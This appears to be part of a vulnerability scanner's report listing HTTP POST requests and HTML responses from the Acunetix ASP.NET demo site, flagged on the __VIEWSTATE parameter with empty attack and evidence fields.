Request Body - size: 1,115 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8310&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgDAogwJpNoIZGRkg6LonmQmv8w0CTWh6IzmQezTmTg%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLnv9%2FpAQLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gLJrBywU6CoX9bBc8zmEbo5XyQN%2Fg%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:57:29 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgDAogwJpNoIZGRkg6LonmQmv8w0CTWh6IzmQezTmTg=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLnv9/pAQLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gLJrBywU6CoX9bBc8zmEbo5XyQN/g==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:White" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1113 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,113 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8314&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgDASbYtp9oIZGRk9U74yk6rS4M8S8LigElhJJTanO0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwK2pMywDALiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gI3Cro%2Fot1HmbVo9mIsmXAD0Jg60g%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:08:49 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgDASbYtp9oIZGRk9U74yk6rS4M8S8LigElhJJTanO0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwK2pMywDALiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gI3Cro/ot1HmbVo9mIsmXAD0Jg60g==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:White" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:Black" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1097 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
